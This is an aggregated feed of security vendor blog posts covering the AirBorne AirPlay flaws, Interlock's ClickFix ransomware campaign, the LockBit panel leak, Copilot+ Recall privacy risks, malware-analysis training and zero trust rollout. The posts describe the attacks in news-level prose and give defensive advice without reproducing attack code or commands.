AirBorne: attacks on devices via Apple AirPlay | Kaspersky official blog

Researchers have discovered a series of major security flaws in Apple AirPlay. They’ve dubbed this family of vulnerabilities – and the potential exploits based on them – “AirBorne”. The bugs can be leveraged individually or in combinations to carry out wireless attacks on a wide range of AirPlay-enabled hardware.

We’re mainly talking about Apple devices here, but there are also a number of gadgets from other vendors that have this tech built in – from smart speakers to cars. Let’s dive into what makes these vulnerabilities dangerous, and how to protect your AirPlay-enabled devices from potential attacks.

What is Apple AirPlay?

First, a little background. AirPlay is an Apple-developed suite of protocols used for streaming audio and, increasingly, video between consumer devices. For example, you can use AirPlay to stream music from your smartphone to a smart speaker, or mirror your laptop screen on a TV.

All this happens wirelessly: streaming typically uses Wi-Fi, or, as a fallback, a wired local network. It’s worth noting that AirPlay can also operate without a centralized network – be it wired or wireless – by relying on Wi-Fi Direct, which establishes a direct connection between devices.

AirPlay Video and AirPlay Audio logos

AirPlay logos for video streaming (left) and audio streaming (right). These should look familiar if you own any devices made by the Cupertino company. Source

Initially, only certain specialized devices could act as AirPlay receivers. These were AirPort Express routers, which could stream music from iTunes through the built-in audio output. Later, Apple TV set-top boxes, HomePod smart speakers, and similar devices from third-party manufacturers joined the party.

However, in 2021, Apple decided to take things a step further – integrating an AirPlay receiver into macOS. This gave users the ability to mirror their iPhone or iPad screens on their Macs. iOS and iPadOS were next to get AirPlay receiver functionality – this time to display the image from Apple Vision Pro mixed-reality headsets.

AirPlay works with Wi-Fi Direct

AirPlay lets you stream content either over your regular network (wired or wireless), or by setting up a Wi-Fi Direct connection between devices. Source

CarPlay, too, deserves a mention, being essentially a version of AirPlay that’s been adapted for use in motor vehicles. As you might guess, the vehicle’s infotainment system is what receives the stream in the case of CarPlay.

So, over two decades, AirPlay has gone from a niche iTunes feature to one of Apple’s core technologies that underpins a whole bunch of features in the ecosystem. And, most importantly, AirPlay is currently supported by hundreds of millions, if not billions, of devices, and many of them can act as receivers.

What’s AirBorne, and why are these vulnerabilities a big deal?

AirBorne is a whole family of security flaws in the AirPlay protocol and the associated developer toolkit – the AirPlay SDK. Researchers have found a total of 23 vulnerabilities, which, after review, resulted in 17 CVE entries being registered. Here’s the list, just to give you a sense of the scale of the problem:

  1. CVE-2025-24126
  2. CVE-2025-24129
  3. CVE-2025-24131
  4. CVE-2025-24132
  5. CVE-2025-24137
  6. CVE-2025-24177
  7. CVE-2025-24179
  8. CVE-2025-24206
  9. CVE-2025-24251
  10. CVE-2025-24252
  11. CVE-2025-24270
  12. CVE-2025-24271
  13. CVE-2025-30422
  14. CVE-2025-30445
  15. CVE-2025-31197
  16. CVE-2025-31202
  17. CVE-2025-31203
AirBorne vulnerability family logo

You know how any serious vulnerability with a modicum of self-respect needs its own logo? Yeah, AirBorne’s got one too. Source

These vulnerabilities are quite diverse: from remote code execution (RCE) to authentication bypass. They can be exploited individually or chained together. So, by exploiting AirBorne, attackers can carry out the following types of attacks:

Example of an attack that exploits the AirBorne vulnerabilities

The most dangerous of the AirBorne security flaws is the combination of CVE-2025-24252 with CVE-2025-24206. In concert, these two can be used to successfully attack macOS devices and enable RCE without any user interaction.

To pull off the attack, the adversary needs to be on the same network as the victim, which is realistic if, for example, the victim is connected to public Wi-Fi. In addition, the AirPlay receiver has to be enabled in macOS settings, with Allow AirPlay for set to either Anyone on the Same Network or Everyone.

Successful zero-click attack on macOS via AirBorne

The researchers carried out a zero-click attack on macOS, which resulted in swapping out the pre-installed Apple Music app with a malicious payload. In this case, it was an image with the AirBorne logo. Source

What’s most troubling is that this attack can spawn a network worm. In other words, the attackers can execute malicious code on an infected system, which will then automatically spread to other vulnerable Macs on any network patient zero connects to. So, someone connecting to free Wi-Fi could inadvertently bring the infection into their work or home network.

The researchers also looked into and were able to execute other attacks that leveraged AirBorne. These include another attack on macOS allowing RCE, which requires a single user action but works even if Allow AirPlay for is set to the more restrictive Current User option.

The researchers also managed to attack a smart speaker through AirPlay, achieving RCE without any user interaction and regardless of any settings. This attack could also turn into a network worm, where the malicious code spreads from one device to another on its own.

Successful zero-click attack on a smart speaker via AirBorne

Hacking an AirPlay-enabled smart speaker by exploiting AirBorne vulnerabilities. Source

Finally, the researchers explored and tested out several attack scenarios on car infotainment units through CarPlay. Again, they were able to achieve arbitrary code execution without the car owner doing anything. This type of attack could be used to track someone’s movements or eavesdrop on conversations inside the car. Then again, you might remember that there are simpler ways to track and hack cars.

Successful zero-click attack on a vehicle via a CarPlay vulnerability

Hacking a CarPlay-enabled car infotainment system by exploiting AirBorne vulnerabilities. Source

Staying safe from AirBorne attacks

The most important thing you can do to protect yourself from AirBorne attacks is to update all your AirPlay-enabled devices. In particular, do this:

  • Update iOS to version 18.4 or later.
  • Update macOS to Sequoia 15.4, Sonoma 14.7.5, Ventura 13.7.5, or later.
  • Update iPadOS to version 17.7.6 (for older iPads), 18.4, or later.
  • Update tvOS to version 18.4 or later.
  • Update visionOS to version 2.4 or later.

As an extra precaution, or if you can’t update for some reason, it’s also a good idea to do the following:

  1. Disable the AirPlay receiver on your devices when you’re not using it. You can find the required setting by searching for “AirPlay”.
AirPlay settings in iOS to protect against AirBorne attacks

How to configure AirPlay in iOS to protect against attacks that exploit the AirBorne family of vulnerabilities

  1. Restrict who can stream to your Apple devices in the AirPlay settings on each of them. To do this, set Allow AirPlay for to Current User. This won’t rule out AirBorne attacks completely, but it’ll make them harder to pull off.
AirPlay settings in macOS to protect against AirBorne attacks

How to configure AirPlay in macOS to protect against attacks that exploit the AirBorne family of vulnerabilities

Install a reliable security solution on all your devices. Despite the popular myth, Apple devices aren’t cyber-bulletproof and need protection too.

What other vulnerabilities can Apple users run into? These are just a few examples:

Kaspersky official blog – ​Read More

Ransomware group uses ClickFix to attack businesses

The ransomware group Interlock has started using the ClickFix technique to gain access to its victims’ infrastructure. In a recent post, we discussed the general concept of ClickFix. Today we’ll look at a specific case where a ransomware group has put this tactic into action. Cybersecurity researchers have discovered that Interlock is using a fake CAPTCHA imitating a Cloudflare-protected site on a page posing as the website of Advanced IP Scanner — a popular free network scanning tool. This suggests the attack is aimed at IT professionals working in organizations of potential interest to the group.

How Interlock is using ClickFix to spread malware

The Interlock attackers lure victims to a webpage with an URL mimicking that of the official Advanced IP Scanner site. The researchers found multiple instances of this same page hosted at different addresses across the web.

When the user clicks the link, they see a message asking them to complete a CAPTCHA, seemingly provided by Cloudflare. The message states that Cloudflare helps companies “regain control of their technology”. This legitimate-looking marketing text is in fact copied from Cloudflare’s own What is Cloudflare? webpage. It’s followed by instructions to press Win + R, then Ctrl + V, and finally Enter. Next come two buttons: Fix it and Retry.

Finally, a message claims that the resource the victim is trying to access needs to verify the connection’s security.

In reality, when the victim clicks Fix it, a malicious PowerShell command is copied to the clipboard. The user then unknowingly opens the command console with Win + R and pastes the command with Ctrl + V. Pressing Enter then executes the malicious command.

Executing the command downloads and launches a 36-megabyte fake PyInstaller installer file. And to distract the victim, a browser window with the real Advanced IP Scanner website opens.

From data collection to extortion: the stages of an Interlock attack

Once the fake installer is launched, a PowerShell script is activated that collects system information and sends it to a C2 server. In response, the server can either send the ooff command to terminate the script, or deliver additional malware. In this case the attackers used Interlock RAT (remote access Trojan) as the payload. The malware is saved in the %AppData% folder and runs automatically, allowing the attackers to access confidential data and establish persistence in the system.

After initial access, the Interlock operators try to use previously stolen or leaked credentials and the Remote Desktop Protocol (RDP) for lateral movement. Their primary target is the domain controller (DC) — gaining access to it allows the attackers to spread malware across the infrastructure.

The final step before launching the ransomware is to steal the victim organization’s valuable data. These files are uploaded to Azure Blob Storage controlled by the attackers. After exfiltrating the sensitive data, the Interlock group publishes it on a new Tor domain. A link to this domain is then provided in a new post on the group’s .onion site.

Ransom note from the Interlock ransomware group

Example of a ransom note sent by the Interlock ransomware group. Source

How to protect against ClickFix attacks

ClickFix and other similar techniques rely heavily on social engineering, so the best protection is a systematic approach focused primarily on raising employee awareness. To help with this, we recommend our Kaspersky Automated Security Awareness Platform, which automates training programs for staff.

In addition, to protect against ransomware attacks, we recommend the following:

Kaspersky official blog – ​Read More

Sednit abuses XSS flaws to hit gov’t entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

WeLiveSecurity – ​Read More

Xoxo to Prague

Xoxo to Prague

Welcome to this week’s edition of the Threat Source newsletter. 

I haven’t been to Prague in a while, which is a pity. It’s a wonderful city — great people, amazing food. I’ve visited customers there, held team meetings at the local office (shoutout to Petr!) and spent some memorable summer days off. But none of those are why I’m sending my greetings this time. 

Last week, anyone trying to access LockBit’s dark web affiliate panels was greeted by a defaced page with the message: 

“Don’t do crime CRIME IS BAD xoxo from Prague” 

Alongside the message was a download link for a compressed archive called “paneldb_dump.zip” —  a 7.5MB file that extracts to a 26MB clear-text SQL dump containing 20 tables. The breach exposed a rare, unfiltered look into LockBit’s operations. 

While most articles focused on the nearly 60,000 Bitcoin addresses or the credentials for 75 admins and affiliates (all with plaintext passwords), I have to admit that I was mesmerized by the “chats” table. 4,423 messages distributed across 208 victims, spanning from Dec. 2024 to April 2025, these chats reveal the raw tactics, ransom demands and negotiation strategies of both affiliates and victims. Sometimes there was just a single unanswered message; in other cases, over 300 messages included “technical support” for unrecoverable files, and even requests for refunds.  

Ransom demands varied widely, from just a few thousand dollars to as much as $2 million in one notable case. There were also several instances of confusion — some mistakenly thought the demand was “100,000 bitcoins” when it was actually “100,000 dollars in bitcoin.” Additionally, there was a case involving a hosting company breach, where it was the company’s customers who ultimately suffered the consequences. The chat exposed that LockBit encrypted all the data with the same key; even though not all victims were willing or able to pay the ransom, LockBit insisted the hoster pay the full amount, making it difficult to collect the asked ransom. 

Negotiations were often pressured by tight deadlines, but European bank holidays on Good Friday, Easter Monday and May 1st further complicated the situation. Multiple times there were situations where the ransom demand increased after a specific deadline. I even found messages from victims asking for more time so they could gather funds in smaller amounts to avoid detection under local anti-money laundering laws. 

In another chat, a victim tried to negotiate by pleading inability to pay a $100k ransom, only to be told, “Seven directors at 14k can’t chime in?” This clearly shows that the “Analytics Department” of LockBit did their homework. 

The level of “trust” placed in affiliates was also striking. Messages included:

Xoxo to Prague

Interestingly, that last service was offered for an extra fee. Let me share some of their $10,000 “tips” for free:

Xoxo to Prague

With these $10,000 tips, I personally think it would be better to get advice before an incident from Talos Incident Response. They can also provide guidance and proactive support as part of the Talos IR Retainer.

The LockBit leak is a rare window into the mechanics of cybercrime and the human stories behind the headlines. And, for now, xoxo to Prague.

The one big thing 

Cisco Talos has observed a growing trend of attack kill chains being split into two stages — initial compromise and subsequent exploitation — executed by separate threat actors. In response to these evolving threats, we have refined the definitions of initial access brokers (IABs) to include subcategories such as financially-motivated initial access (FIA), state-sponsored initial access (SIA), and opportunistic initial access (OIA).   

Why do I care? 

This trend complicates traditional threat modeling and actor profiling, as it requires understanding the intricate relationships and interactions between various groups. For example, hunting and containment strategies that may defend against one type of IAB may not be suitable for another. 

So now what? 

We have identified several methods for analyzing compartmentalized attacks and propose an extended Diamond Model, which adds a “Relationship Layer” to enrich the context of the relationships between the four features. Familiarize yourself with the new taxonomy we propose, and incorporate this new methodology for modeling and tracking compartmentalized threats into your toolkit. 

Top security headlines of the week 

Operation Moonlander  
A criminal proxy network that has been around for more than 20 years and was built on thousands of infected IOT and end-of-life (EoL) devices was dismantled in an international operation. (U.S. Attorney’s Office

Supply Chain Compromise  
A deprecated node.js package with more than 40k downloads per week, ‘rand-user-agent’ has been compromised with a malicious payload dubbed “RATatouille”. This is a clear case of a supply chain attack. (Aikido

Ascension Health Data Breach Impacts Over 430,000 
Healthcare provider Ascension has disclosed a data breach affecting over 430,000 patients.  (Bleeping Computer

Germany Shuts Down eXch Over $1.9B Laundering 
German authorities have shut down the cryptocurrency mixer eXch due to its alleged involvement in laundering approximately $1.9 billion in illicit funds, seizing a large amount of cryptocurrency and data. (BKA, German language)

Can’t get enough Talos? 

Talos Takes
Follow the motive: Rethinking defense against Initial Access Groups. Listen here.

Talos in the news
Initial Access Brokers Target Brazil Execs via NF-e Spam and Legit RMM Trials (The Hacker News

Why MFA is getting easier to bypass and what to do about it (Ars Tecnnica)

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week  

SHA 256: e00aa8146cf1202d8ba4fffbcf86da3c6d8148a80bb6503d89b0db2aa9cc0997 
MD5: eae884415e5fd403e4f1bf46f90df0be 
VirusTotal: https://www.virustotal.com/gui/file/e00aa8146cf1202d8ba4fffbcf86da3c6d8148a80bb6503d89b0db2aa9cc0997  
Typical Filename: paneldb_dump.zip 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 
MD5: 7bdbd180c081fa63ca94f9c22c457376 
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Typical Filename: c0dwjdi6a.dll 
Claimed Product: N/A 
Detection Name: Trojan.GenericKD.33515991 

Cisco Talos Blog – ​Read More

Microsoft Copilot+ Recall: who should disable it, and how | Kaspersky official blog

When Microsoft first announced its “photographic memory” Recall feature for Copilot+ PCs a year ago, cybersecurity experts were swift in sounding the alarm. Recall’s many flaws posed a serious threat to privacy, prompting Microsoft to postpone its release for further refinement. The updated Recall came to Windows Insider Preview builds in April 2025, and was rolled out widely in May on devices equipped with the necessary hardware. The essence remains the same: Recall memorizes all your actions by continuously taking screenshots and using OCR to analyze their content. However, with the latest update, the security of this data has been significantly enhanced. How much difference does this actually make? And is the convenience of Recall really worth the potential loss of control over your personal data?

What’s new in Recall’s second coming

Since the initial announcement, which we covered in detail, Microsoft has addressed several key criticisms raised by cybersecurity professionals.

First, Recall now only activates with user permission during the initial system setup. The interface doesn’t manipulate users into agreeing with visual tricks like highlighting the “Yes” button.

Second, Recall’s database files are now encrypted, with key storage and cryptographic operations handled by the hardware-based TPM (Trusted Platform Module), making their extraction significantly more difficult.

Third, a special filter attempts to prevent saving screenshots or text when the screen contains potentially sensitive information — a private browser window, a payment data input form, password manager cards, and so on. Note it only “attempts”: testers have already reported numerous instances where confidential data slipped through the filter and ended up in the OCR database.

Ars Technica highlights several other positive changes:

  • Recall is enabled for each PC user individually, rather than everyone at once.
  • Recall can be uninstalled completely.
  • A Microsoft account isn’t required.
  • No internet connection is needed — all data is processed locally.
  • To initially launch Recall, BitLocker disk encryption and Windows Hello biometric authentication (face or fingerprint recognition) must be enabled.
  • Windows Hello authentication is required every time the Recall search is used.

Why Recall still poses risks

Microsoft has indeed put some effort into responding to the criticism. However, the current version of Recall still has a number of issues.

First, biometric authentication is only required during the initial setup of Recall. For subsequent launches, the AI assistant will also ask to confirm your identity, but presenting your face or fingerprint is no longer necessary. A regular Windows PIN will suffice, and it’s relatively easy for someone to take a peek at, or guess, your PIN, no matter whether you’re at home or at work. One reviewer admits to asking his girlfriend to find a screenshot of a specific Signal chat on his computer — she guessed the password and found the screenshot in just five minutes.

Second, Recall can also be re-activated without biometrics. If the account owner tried Recall but then disabled it, anyone who knows the PIN can re-enable screenshot capture and smart search. All that’s left is to wait a little while, log back in, and browse the results.

Third, as mentioned, automatic filtering of sensitive data is unreliable. In theory, Recall doesn’t take screenshots in many high-risk scenarios: when a browser window is opened in private mode, when remote access to another desktop is active, when entering payment info or passwords, and also on additional inactive displays and desktops. In practice, these situations aren’t always recognized — for example, the filter fails to detect the private mode in not-so-common browsers (such as Vivaldi) and remote desktops, including those accessed with the hugely popular AnyDesk.

Finally — and this deserves a whole category of its own — Recall meticulously logs the computer owner’s interactions with other users, potentially violating both their privacy rights and the data retention policies of messaging and collaboration tools. For example, if the computer owner is in a Zoom or Teams call with automatic transcription enabled, Recall will save a full recording of the call with a transcript of who said what. If a self-destructing WhatsApp or Signal chat is open on screen, Recall will save it anyway, despite the chat’s privacy policies. Photos and videos intended for one-time viewing will also be stored if just one person in the conversation uses Recall.

All of this matters in two dangerous scenarios: (i) when someone who knows (or can guess) the PIN gains unauthorized physical access to the computer; and (ii) when an attacker exploiting Windows vulnerabilities gains remote access to it. Year after year, despite the tightening of security measures, hackers keep finding ways to elevate privileges on compromised machines and exfiltrate information — even encrypted data.

Impact on performance and battery life

Although Recall was originally designed for high-performance PCs equipped with a dedicated chip for AI computing (NPU) — only found in models released over the past 12 months — the capture and processing of screenshots can still sometimes interfere with the user experience in such powerful PCs. This is particularly noticeable when playing games, as Recall diligently takes screenshots and records in-game dialogue, consuming significant memory and computing resources, thus loading the NPU by up to 80%! Even when the device isn’t plugged in (but the battery is almost fully charged), Recall continues working, draining the battery much faster than usual.

Who should disable or remove Recall?

Microsoft is now offering users a fair choice: enable Recall, ignore it, or completely remove it from the computer. This is a much better approach than previous campaigns to push Edge, Cortana, or Windows Media Player. If you see a screen prompting enabling Recall, consider whether you fall into one of these categories:

  • Anyone working with trade secrets, other people’s confidential data, or personal data in general (e.g., lawyers, doctors, and other professionals).
  • Active users of video conferencing, remote tech-support services, or other tech involving the handling of others’ information.
  • People engaged in particularly private correspondence — especially using secure messengers and disappearing chats/messages.
  • Individuals living with jealous or nosy family members, or working in an office with overly curious colleagues.

For all these users, we recommend steering clear of Recall — or, better yet, removing it entirely.

How to disable or remove Recall

To disable Recall:

  1. Open Settings in the Windows Start menu and select Privacy & security.
  2. Within Privacy & security, find the Recall & snapshots subsection.
  3. In this subsection, toggle off Save snapshots, and click Delete snapshots to erase any data already collected.
How to disable Microsoft Copilot+ Recall

How to disable Microsoft Copilot+ Recall and delete any stored data. Source

To remove Recall completely:

  1. In the Windows Start menu search bar, type Turn Windows features on or off.
  2. In the retro-looking window that opens, locate the Recall entry.
  3. Uncheck the box next to this item and click OK.

After this, Recall will be removed from your PC, and its settings will no longer appear under Privacy & security.

How to remove Microsoft Copilot+ Recall completely

How to remove Microsoft Copilot+ Recall from your computer completely. Source

How to configure Recall if you decide to try it anyway

If you don’t fall into any of the categories above and really want to Recall something like “the photo where Jane’s cat is lying on the blue sofa”, we recommend taking a few precautions and adjusting your settings for better security:

  • Disable less secure sign-in methods in Windows, such as pattern locks and PINs. Use only a strong password and biometric authentication.
  • Manually add to Recall’s exclusion list all messengers you use for confidential correspondence, password managers, finance apps and websites, and any other apps or websites that may contain private information. For ethical reasons, it’s a good idea to exclude all video conferencing apps. For performance reasons, exclude all games.
  • Set a screenshot retention period that suits your needs, keeping it to a minimum. Possible options range from 30 to 180 days.
  • Periodically — ideally a few times a week — check Recall to see which apps and sites were recently captured. This will help you identify and manually delete or filter out any sources of sensitive information you may have missed earlier.

Regardless of your Recall settings or whether it’s installed at all, the two most common data leak scenarios are direct theft from your device by infostealer malware, and entering your credentials on a phishing site. To guard against these risks, be sure to use a comprehensive cybersecurity solution, such as Kaspersky Premium.

Under the pretense of user convenience — and sometimes without any pretense at all — various organizations collect information about you that you may not even be aware of. How? Read here:

Kaspersky official blog – ​Read More

How Malware Analysis Training Powers Up SOC and MSSP Teams

Security Operations Centers (SOCs) and Managed Security Service Providers (MSSPs) serve as the frontline defenders for organizations worldwide. The teams operate in high-pressure environments, analyzing security incidents, monitoring threats, and responding to attacks in real time. Continuous learning — especially through hands-on malware analysis training — is not just beneficial, but essential for their performance. 

Educational programs from experienced industry players, such as ANY.RUN’s Security Training Lab, significantly enhance the capabilities of these teams, driving efficiency, expertise, and business value.  

How SOCs and MSSPs Operate 

SOCs and MSSPs are structured around continuous threat detection and incident response. SOCs are in-house teams that monitor an organization’s networks, systems, and endpoints 24/7. MSSPs offer similar services to multiple clients on a contractual basis. Both rely on skilled analysts and threat hunters to interpret complex data, prioritize alerts, and mitigate attacks before they cause damage. 

Efficiency in these teams depends on collaboration between tiers of analysts, threat intelligence integration, and the ability to act fast on accurate, contextual information. But to be truly effective, teams must go beyond automated alerts and develop a deep understanding of threats — including the malware behind them. 

Why Continuous Learning Matters 

Attackers constantly adapt their techniques, whether through obfuscation, living-off-the-land tactics, or leveraging zero-day vulnerabilities. Without ongoing training, even the most experienced analysts can fall behind. 

Continuous learning keeps cybersecurity professionals current on new attack vectors, IOCs, and detection methods. It also builds confidence and readiness in handling new threats. For organizations, this promises faster response times, fewer false positives, and more resilient defenses. 

SOCs and MSSPs: different workflows, same need for practical training
🛡 SOC Tasks Requiring Malware Analysis Training

(Internal, organization-focused operations)

🌐 MSSP Tasks Requiring Malware Analysis Training
(Multi-client, service-driven operations)
  • Investigate endpoint infections to trace malware entry and behavior
  • Analyze suspicious files and email attachments flagged by EDR/XDR
  • Correlate logs and IOCs to confirm ongoing attacks
  • Refine detection rules (e.g., YARA, SIEM correlation) based on malware TTPs
  • Support incident response playbooks with updated malware knowledge
  • Simulate attack scenarios to test internal defenses against known malware
  • Perform post-incident forensic analysis for internal audits and reporting
  • Analyze malware artifacts from multiple client environments
  • Identify zero-day threats across diverse networks
  • Enrich threat intelligence feeds with behavior-based indicators
  • Develop client-specific detection content (custom alerts, signatures)
  • Prioritize alerts and escalations using malware behavior context
  • Provide detailed incident reports explaining malware operations to clients
  • Proactively hunt for new threats across managed client infrastructure
What They Have in Common
✅ Require hands-on training with real-world malware

✅ Need visibility into malware behavior (e.g., process trees, network activity)

✅ Rely on fast, accurate triage and threat validation

✅ Benefit from platforms like ANY.RUN Security Training Lab for safe, interactive analysis

✅ Aim to improve detection and response times through deep threat understanding

The Role of Real-World Malware Analysis 

Among the most impactful forms of learning is hands-on malware analysis. Unlike sanitized textbook examples, real malware samples expose actual tools, behaviors, and evasion techniques used by threat actors. 

This kind of analysis helps SOC and MSSP teams: 

  • Develop a proactive rather than reactive security posture. 

Training on real malware helps analysts not only recognize threats but also understand their mechanics and impact, which is crucial for effective countermeasures. Moreover, exposure to community-submitted malware, as facilitated by services like ANY.RUN, illustrates current challenges faced by organizations worldwide and ensures that training remains relevant, aligned with the latest attack trends.  

This practical focus empowers SOC and MSSP teams to respond effectively to incidents, reducing the risk of operational disruption or data breaches. 

Continuous learning also fosters a culture of adaptability, critical for teams operating in high-pressure environments. Mastering advanced analysis techniques, such as debugging or reverse engineering, equips analysts to dissect complex malware, reducing the time needed to understand and neutralize threats. This efficiency translates to lower mean time to detect (MTTD) and mean time to respond (MTTR), key metrics for SOC and MSSP performance.  

Ongoing education supports career progression, boosting morale and retention among analysts, which is vital given the industry’s talent shortage. By investing in continuous learning, SOCs and MSSPs ensure their teams remain agile, competent, and prepared for the next wave of cyber threats. 

How ANY.RUN’s Security Training Lab Supports Practical Learning 

ANY.RUN’s Security Training Lab is built to bridge the gap between theory and practice. It offers an isolated, interactive environment where users can safely analyze live malware samples without risk to their infrastructure. Users can observe how malware behaves in real time, test detection strategies, and simulate incident response scenarios. 

Level up malware analysis expertise in your team
with ANY.RUN’s Security Training Lab 



Contact us


 Key benefits include: 

  • 30-hour interactive digital course comprising written materials, video lectures, tasks, and tests, structured into ten modules that cover critical aspects of malware analysis. 
  • A realistic training ground using actual malware strains 
  • Tools that mirror real-world SOC environments. 
  • The support of inter-industry collaboration. 
Contents and modules of the Security Training Lab program 

The Security Training Lab is scalable and flexible, supports self-paced, instructor-led, and hybrid learning formats. Instructors can track the progress of their students and assess practical skills, ensuring that training outcomes are measurable and aligned with organizational goals.  

Learners also gain unlimited access to the sandbox and a repository of fresh malware samples submitted by ANY.RUN’s global user community, including 15,000 corporate security teams.  

Example of a practical task with a malware sample from ANY.RUN’s Sandbox 

Raising Cybersecurity Expertise — and Business Value 

When SOC and MSSP analysts become more adept through real-world training, the entire organization benefits. Skilled teams: 

  • Reduce mean time to detect and respond (MTTD/MTTR); 
  • Lower the risk of breaches and data loss; 
  • Enhance client trust (especially for MSSPs); 
  • Optimize ROI through improved service levels. 

Investing in continuous, practical training is not just an HR initiative — it’s a business decision. It strengthens operational security, reduces incident costs, and builds a reputation for reliability and resilience. 

Conclusion 

In the arms race between defenders and attackers, the best defense is a well-trained team. For SOCs and MSSPs, regular exposure to real-world malware and hands-on analysis tools is a powerful way to sharpen skills, improve performance, and protect what matters. ANY.RUN’s Security Training Lab offers practical training that elevates team expertise and delivers measurable business outcomes. 

About ANY.RUN

ANY.RUN supports over 15,000 organizations across numerous industries, including banking, manufacturing, and healthcare. Our interactive malware analysis and threat intelligence tools allow companies and SOC teams to speed up their threat investigations, ensure proactive security, and build stronger and more resilient operations.

The post How Malware Analysis Training Powers Up SOC and MSSP Teams appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

How to implement zero trust: first steps and success factors

This year marks the 15th anniversary of the first guide to implementing the zero trust security concept, which, according to a Gartner survey, almost two-thirds of surveyed organizations have adopted to some extent. Admittedly (in the same Gartner survey), for 58% of them this transition is far from complete, with zero trust covering less than half of infrastructure. Most organizations are still at the stage of piloting solutions and building the necessary infrastructure. To join the vanguard, you need to plan the transition to zero trust with eyes wide open to the obstacles that lie ahead, and to understand how to overcome them.

Zero trust best practices

Zero trust is a security architecture that views all connections, devices, and applications as untrusted and potentially compromised — even if they’re part of the organization’s internal infrastructure. Zero trust solutions deliver continuous adaptive protection by re-verifying every connection and transaction based on a potentially changed security context. This way, companies can mold their information security to the real-world conditions of hybrid cloud infrastructures and remote working.

In addition to the oldest and best-known guidelines, such as Forrester’s first report and Google’s BeyondCorp, the components of zero trust are detailed in NIST SP 800-207 (Zero Trust Architecture), while the separate NIST SP 1800-35B offers implementation recommendations. There are also guidelines that map specific infosec measures and tools to the zero trust methodology, such as CIS Controls v8. CISA offers a handy maturity model, though it’s primarily optimized for government agencies.

In practice, zero trust implementation rarely follows the rule book, and many CISOs end up having to mix and match recommendations from these guidance documents with the guidelines of their key IT suppliers (for example, Microsoft), prioritizing and selecting measures based on their specific situation.

What’s more, all these guides are less than forthcoming in describing the complexities of implementation.

Executive buy-in

Zero trust migration isn’t purely a technical project, and therefore requires substantial support on the administrative and executive levels. In addition to investing in software, hardware, and user training, it demands significant effort from various departments, including HR. Company leadership needs to understand why the changes are needed and what they’ll bring to the business.

To get across the value and importance of a project, the “incident cost” or “value at risk” needs to be clearly communicated on the one hand, as do the new business opportunities on the other. For example, zero trust protection can enable broader use of SaaS services, employee-owned devices, and cost-effective network organization solutions.

Alongside on-topic meetings, this idea should be reinforced through specialized cybersecurity training for executives. Not only does such training instill specific infosec skills, it also allows your company to run through crisis management and other scenarios in a cyberattack situation — often using specially designed business games.

Defining priorities

To understand where and what zero trust measures to apply in your infrastructure, you’ll need a detailed analysis of the network, applications, accounts, identities, and workloads. It’s also crucial to identify critical IT assets. Typically making up just a tiny part of the overall IT fleet, these “crown jewels” either contain sensitive and highly valuable information, or support critical business processes. Consolidating information about IT assets and their value will make it easier to decide which components are most in need of zero trust migration, and which infosec measures will facilitate it. This inventory will also unearth outdated segments of the infrastructure for which migration to zero trust would be impractical or technically infeasible.

You need to plan in advance for the interaction of diverse infrastructure elements, and the coexistence of different infosec measures to protect them. A typical problem goes as follows: a company has already implemented some zero trust components (for example, MFA and network segmentation), but these operate completely independently, and no processes and technologies are planned to enable these components to work together within a unified security scenario.

Phased implementation

Although planning for zero trust architecture is done holistically, its practical implementation should begin with small, specific steps. To win managerial support and to test processes and technologies in a controlled environment, start with measures and processes that are easier to implement and monitor. For example, introduce multi-factor authentication and conditional access just for office computers and the office Wi-Fi. Roll out tools starting with specific departments and their unique IT systems, testing both user scenarios and the performance of infosec tools, all while adjusting settings and policies accordingly.

Which zero trust architecture components are easier to implement, and what will help you achieve the first quick wins depends on your specific organization. But each of these quick wins should be scalable to new departments and infrastructure segments; and where zero trust has already been implemented, additional elements of the zero trust architecture can be piloted.

While a phased implementation may seem to increase the risk of getting stuck at the migration stage and never completing the transition, experience shows that a “big bang” approach — a simultaneous shift of the entire infrastructure and all processes to zero trust — fails in most cases. It creates too many points of failure in IT processes, snowballs the load on IT, alienates users, and makes it impossible to correct any planning and implementation errors in a timely and minimally disruptive manner.

Phased implementation isn’t limited to first steps and pilots. Many companies align the transition to zero trust with adopting new IT projects and opening new offices; they divide the migration of infrastructure into stages — essentially implementing zero trust in short sprints while constantly monitoring performance and process complexity.

Managing identities… and personnel

The cornerstone of zero trust is a mature Identity Access Management (IAM) system, which needs to be not only technically sound but also supported administratively at all times. Data on employees, their positions, roles, and resources available to them must be kept constantly up-to-date, requiring significant support from HR, IT, and the leadership of other key departments. It’s imperative to involve them in building formal processes around identity management, taking care to ensure that they feel personally responsible for these processes. It must be stressed that this isn’t a one-off job — the data needs to be checked and updated frequently to prevent situations such as access creep (when permissions issued to an employee for a one-time project are never revoked).

To improve information security and make zero trust implementation a truly team effort, sometimes it’s even necessary to change the organizational structure and areas of responsibility of employees — breaking down silos that confine people within narrow job descriptions. For example, one large construction company shifted from job titles such as “Network Engineer” and “Server Administrator” to the more generic “Process Engineer” to underscore the interconnectivity of the roles.

Training and feedback

Zero trust migration doesn’t pass unnoticed by employees. They have to adapt to new authentication procedures and MFA tools, learn how to request access to systems that don’t grant it by default be aware that they might occasionally need to re-authenticate to a system they logged in to just an hour ago, and that previously unseen tools like ZTNA, MDM, or EDR (often bundled in a single agent, but sometimes separate), may suddenly appear on their computers. All this requires training and practice.

For each phase of implementation, it’s worth forming a “focus group” of business users. These users will be the first to undergo training and can help refine training materials in terms of language and content, as well as provide feedback on how the new processes and tools are working. Communication with users should be a two-way street: it’s important to convey the value of the new approach, while actively listening to complaints and recommendations to adjust policies (both technical and administrative), address shortcomings, and improve the user experience.

